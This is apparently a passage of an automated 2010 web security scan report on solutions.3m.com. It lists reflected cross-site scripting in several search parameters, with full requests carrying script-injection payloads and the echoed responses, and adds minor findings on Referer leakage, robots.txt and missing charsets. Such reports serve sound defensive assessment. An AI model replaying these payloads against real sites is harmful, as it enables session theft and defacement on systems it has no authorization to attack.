The value of the pl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ab63"><script>alert(1)</script>4e2d913c70a was submitted in the pl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A3ab63"><script>alert(1)</script>4e2d913c70a&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:45 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:45 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite11
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A3ab63"><script>alert(1)</script>4e2d913c70a&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.11. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d5c"><script>alert(1)</script>5a1460a446b was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C32d5c"><script>alert(1)</script>5a1460a446b&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:59 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:55 GMT
Vary: User-Agent,Cookie,Accept-Encoding
Served-By: Pyrite10
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
arch/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C32d5c"><script>alert(1)</script>5a1460a446b&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.12. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a59"><script>alert(1)</script>dee75608e5 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc66a59"><script>alert(1)</script>dee75608e5&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:52 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:48 GMT
Vary: User-Agent,Cookie,Accept-Encoding
Served-By: Pyrite10
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 15915

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc66a59"><script>alert(1)</script>dee75608e5&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.13. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3597d"><script>alert(1)</script>481c7c0fd9f was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F3597d"><script>alert(1)</script>481c7c0fd9f&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:53 GMT
Server: IBM_HTTP_Server
Cache-Control: public
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:53 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite12
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F3597d"><script>alert(1)</script>481c7c0fd9f&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://solutions.3m.com/en_US/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /en_US/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/?WT.mc_id=www.3m.com/us HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/wps/portal/3M/en_US/Products/ProdServ/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:14 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 10 Nov 2010 16:15:01 GMT
ETag: "17020f-c427-494b528c78b40"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Served-By: Pyrite10
Content-Type: text/html
Content-Length: 50215

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>

<!-- Wed Nov 10 10:15:01 CST 2010 -->
<!-- Added by HTTrack --><meta http-equiv="conte
...[SNIP]...
<li><a href="http://www.scotchbrand.com/wps/portal/3M/en_US/ScotchBrand/Scotch/Products/ProductCatalog/?PC_7_RJH9U52300LM30I87QR3ES18H7_nid=G9ZQC1QCC6be7HSQTT8P39gl">Mounting, Adhesives, & Tapes</a>
...[SNIP]...
<li><a href="http://www.scotchbrand.com/wps/portal/3M/en_US/ScotchBrand/Scotch/Products/ProductCatalog/?PC_7_RJH9U52300LM30I87QR3ES18H7_nid=6MTTTJ0NH8beV9FWH5FFP6gl">Packaging & Mailing</a>
...[SNIP]...
<li><a href="http://www.scientificanglers.com/">Fly Fishing (Scientific Anglers<!-- -->
...[SNIP]...
<li><a href="http://www.scotch-blue.com/">Painter...s Tapes (Scotch-Blue...)</a>
...[SNIP]...
<div class="CHPpromodiv"> <a onclick="dcsMultiTrack('WT.ad','','WT.ac','USCHPromo_Nov10_CORP_HalfMarathon')" href="http://www.3mhalfmarathon.com/"><img class="imagealignedleft" height="100" alt="3M Austin Half Marathon" src="images/blobservletcd61.jpg?locale=en_US&amp;lmd=1288624886000&amp;assetId=1258559230583&amp;assetType=MMM_Image&amp;blobAtt
...[SNIP]...
<p><a onclick="dcsMultiTrack('WT.ad','','WT.ac','USCHPromo_Nov10_CORP_HalfMarathon')" href="http://www.3mhalfmarathon.com/">Join us Sunday, Jan. 30, 2011.</a>
...[SNIP]...
<div class="CHPpromodiv"> <a onClick="dcsMultiTrack('WT.cg_n','CHP Promotional Zone Click
Events','WT.cg_s','USCHPromo_Nov10_CORP_Shop3MDefault','WT.ad','','DCS.dcsuri','http://solutions.3m.com/en_US/chp/dcsevents/Promotions-Image-Click.html','WT.ti','Promotions Image Click')"
href="http://www.shop3m.com/?WT.ac=3Mcom_US_chp" class="imagealignedleft" >
<img height="100" alt="Shop 3M" src="images/blobservlet1db6.gif?locale=en_US&amp;univid=1180608902577&amp;fallback=false&amp;assetType=MMM_Image&amp;blobAttribute=ImageFile" width="120" border="0" />
...[SNIP]...
<p><a onClick="dcsMultiTrack('WT.cg_n','CHP Promotional Zone Click Events','WT.cg_s','USCHPromo_Nov10_CORP_Shop3MDefault','WT.ad','','DCS.dcsuri','http://solutions.3m.com/en_US/chp/dcsevents/Promotions-Link-Click.html','WT.ti','Promotions Link Click')" href="http://www.shop3m.com/?WT.ac=3Mcom_US_chp">Go to Shop 3M</a>
...[SNIP]...
<div class="CHPpromodiv"> <a onClick="dcsMultiTrack('WT.cg_n','CHP Promotional Zone Click Events','WT.cg_s','USCHPromo_Nov10_OFSD_3MPostItLabels','WT.ad','','DCS.dcsuri','http://solutions.3m.com/en_US/chp/dcsevents/Promotions-Image-Click.html','WT.ti','Promotions Image Click')" href="http://www.post-it.com/labels" class="imagealignedleft" ><img height="100" alt="3M Post-It Labels Rebate Promotion" src="images/blobservlet6fa3.jpg?locale=en_US&amp;univid=1273657408434&amp;fallback=false&amp;assetType=MMM_Image&amp;blobAttribute=ImageFile"
...[SNIP]...
<div class="CHPpromodiv"> <a onClick="dcsMultiTrack('WT.cg_n','CHP Promotional Zone Click Events','WT.cg_s','USCHPromo_Nov10_OFSD_PostItNewSite','WT.ad','','DCS.dcsuri','http://solutions.3m.com/en_US/chp/dcsevents/Promotions-Image-Click.html','WT.ti','Promotions Image Click')" href="http://www.post-it.com/" class="imagealignedleft" ><img height="100" alt="Post-It Launches New Site" src="images/blobservletb328.jpg?locale=en_US&amp;univid=1273665895488&amp;fallback=false&amp;assetType=MMM_Image&amp;blobAttribute=ImageFile" width="33
...[SNIP]...
</span><a href="http://www.businesswire.com/portal/site/3m/index.jsp?ndmViewId=news_view&amp;ndmConfigId=1000941&amp;newsId=20101108005308&amp;newsLang=en" target="_blank">3M Skin & Wound Care Re-Launches Cavilon Professional Skin Care Line to Off...
            </a>
...[SNIP]...
</span><a href="http://www.businesswire.com/portal/site/3m/index.jsp?ndmViewId=news_view&amp;ndmConfigId=1000941&amp;newsId=20101102006787&amp;newsLang=en" target="_blank">3M to Participate in Upcoming Investor Conference</a>
...[SNIP]...
</span><a href="http://www.businesswire.com/portal/site/3m/index.jsp?ndmViewId=news_view&amp;ndmConfigId=1000941&amp;newsId=20101028005801&amp;newsLang=en" target="_blank">3M Achieves Record Sales of $6.9 Billion on 11 Percent Organic Volume Growt...
            </a>
...[SNIP]...

2.2. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/wps/portal/3M/en_US/WW2/Country/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeLoyalty_MID_jzaz6aHrDO=2; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916812131:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:14:18 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:14:17 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite9
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 35870

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
</span><a href="http://www.scotchbrand.com/wps/portal/3M/en_US/ScotchBrand/Scotch/Solutions/Two/"><span class="l">
...[SNIP]...
</span><a href="http://www.scotchbrand.com/wps/portal/3M/en_US/ScotchBrand/Scotch/Products/ProductCatalog/?PC_7_RJH9U52300LM30I87QR3ES18H7_nid=SSB39BK972gsTF1RRQ4PQRgl28ZWQF5K1Cbl"><span class="l">
...[SNIP]...
</span><a href="http://www.3mfloorprotection.com/contact-us/"><span class="l">
...[SNIP]...
</span><a href="http://www.filtrete.com/wps/portal/3M/en_US/FiltreteUS/Filtrete/About-Us/Who-We-Are/"><span class="l">
...[SNIP]...
</span><a href="http://www.filtrete.com/wps/portal/3M/en_US/FiltreteUS/Filtrete/Support/Contact-Us/"><span class="l">
...[SNIP]...
</span><a href="http://www.futuro-usa.com/wps/portal/3M/en_US/Futuro/Global/"><span class="l">
...[SNIP]...
</span><a href="http://www.acebrand.com/wps/portal/3M/en_US/AceBrand/Home/Resources/History/"><span class="l">
...[SNIP]...
</span><a href="http://www.scotch-brite.com/wps/portal/3M/en_US/Scotch-BriteBrand/Scotch-Brite/Offers/Reviews/"><span class="l">
...[SNIP]...
<div id="oneboximage"><a href="http://www.Shop3M.com/80610833750.html?WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750" onclick="javascript:oneboxEStoreClick('Scotch.. Linerless Rubber Splicing Tape 130C, 1 in x 30 ft (25 mm x 9.1 m)',';Product image','http://www.Shop3M.com/80610833750.html?WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750'); return false; "><img src="http://site.innovationestore.com/images/onebox.php?id=80610833750" alt="" class="onebox125">
</a>
...[SNIP]...
<p class="s"><a href="http://www.Shop3M.com/80610833750.html?WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750" onclick="javascript:oneboxEStoreClick('Scotch.. Linerless Rubber Splicing Tape 130C, 1 in x 30 ft (25 mm x 9.1 m)',';Product name','http://www.Shop3M.com/80610833750.html?WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750'); return false; "><strong>
...[SNIP]...
<strong><a href="http://www.Shop3M.com/80610833750.html?WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750" onclick="javascript:oneboxEStoreClick('Scotch.. Linerless Rubber Splicing Tape 130C, 1 in x 30 ft (25 mm x 9.1 m)',';Buy now','http://www.Shop3M.com/80610833750.html?WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750'); return false; ">Buy It Now</a>
...[SNIP]...
<p class="s"><a href="http://storeapps.net/search/3MeStore/?keyword=%7C&amp;WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750" onclick="javascript:oneboxEStoreClick('','View more','http://storeapps.net/search/3MeStore/?keyword=%7C&amp;WT.mc_ev=clickthrough&amp;WT.mc_id=3M-com-GoogleOneBox-80610833750'); return false; ">View more '|' products</a>
...[SNIP]...

3. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /en_US

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: solutions.3m.com

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 05 Nov 2009 15:15:46 GMT
ETag: "b28009-1f3-3399cc80"
Accept-Ranges: bytes
Content-Length: 499
Served-By: Pyrite12
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wps/myportal/
Disallow: /wps/portal/_s.155/
Disallow: /wps/portal/_l/
Disallow: /wps/portal/.cmd/
Disallow: /wps/portal/3M/en_US/Food_Industry/Home/
Disallow: /wps/porta
...[SNIP]...

4. HTML does not specify charset  previous  next
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


4.1. http://solutions.3m.com/en_US/images/blobservlet10d5html.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /en_US/images/blobservlet10d5html.html

Request

GET /en_US/images/blobservlet10d5html.html?locale=en_US&lmd=1251928675000&assetId=1180613431498&assetType=MMM_Image&blobAttribute=ImageFile HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Sep 2009 21:57:55 GMT
ETag: "11f05ac-c00-5bf51ec0"
Accept-Ranges: bytes
Content-Length: 3072
Served-By: Pyrite9
Content-Type: text/html

//(c) 2006 Valerio Proietti (http://mad4milk.net). MIT-style license.
//moo.fx.js - depends on prototype.js OR prototype.lite.js
//version 2.0

var Fx = fx = {};

Fx.Base = Class.create({

   setOptions
...[SNIP]...

4.2. http://solutions.3m.com/en_US/images/blobservlet1e8fhtml.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /en_US/images/blobservlet1e8fhtml.html

Request

GET /en_US/images/blobservlet1e8fhtml.html?locale=en_US&lmd=1251928756000&assetId=1180610444093&assetType=MMM_Image&blobAttribute=ImageFile HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Sep 2009 21:59:16 GMT
ETag: "11f0705-122bf-60c91500"
Accept-Ranges: bytes
Content-Length: 74431
Served-By: Pyrite9
Content-Type: text/html

var Prototype={Version:"1.6.0.2",Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf("AppleWebKit/")>-1,Gecko:navigator.userAgent.indexOf("Gecko")
...[SNIP]...

4.3. http://solutions.3m.com/en_US/images/blobservlet68dahtml.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /en_US/images/blobservlet68dahtml.html

Request

GET /en_US/images/blobservlet68dahtml.html?locale=en_US&lmd=1270140568000&assetId=1258564617341&assetType=MMM_Image&blobAttribute=ImageFile HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: */*
